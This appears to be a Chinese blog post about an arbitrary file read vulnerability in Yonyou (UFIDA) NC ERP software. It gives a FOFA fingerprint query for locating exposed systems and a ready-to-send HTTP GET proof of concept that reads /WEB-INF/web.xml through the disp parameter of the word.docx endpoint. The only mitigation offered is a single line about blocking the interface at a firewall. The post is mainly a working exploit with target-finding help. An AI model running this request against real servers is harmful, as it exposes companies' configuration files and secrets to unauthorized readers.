用友NC word.docx任意文件读取漏洞

文章目录

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

python 复制代码
app="用友-UFIDA-NC"

漏洞利用

Poc:

python 复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

修复建议

临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的,或者说都是输。】

相关推荐
星尘安全3 小时前
一种新的电子邮件攻击方式:AiTM
开发语言·网络安全·php·网络钓鱼·aitm
世界尽头与你3 小时前
安全热点问题
安全·网络安全
忘不了情6 小时前
前端下载word、excel文件的两种方法
word
白帽黑客cst7 小时前
网络安全(黑客技术) 最新三个月学习计划
网络·数据结构·windows·学习·安全·web安全·网络安全
世界尽头与你9 小时前
活动目录安全
安全·网络安全·内网安全
anddddoooo9 小时前
vulnhub(11):derpnstink(hydra爆破用户名和密码、验证的文件上传)
linux·运维·服务器·安全·web安全·网络安全
web_learning_32110 小时前
网络安全证书考取相关知识
安全·web安全·网络安全
看山还是山,看水还是。11 小时前
《网络通信原理》
http·网络安全·智能路由器·信息与通信·信号处理
世界尽头与你14 小时前
移动应用安全
安全·网络安全
SRC_BLUE_1715 小时前
NISP 一级 | 8.2 打击网络违法犯罪相关法律法规
网络安全·nisp·证书获取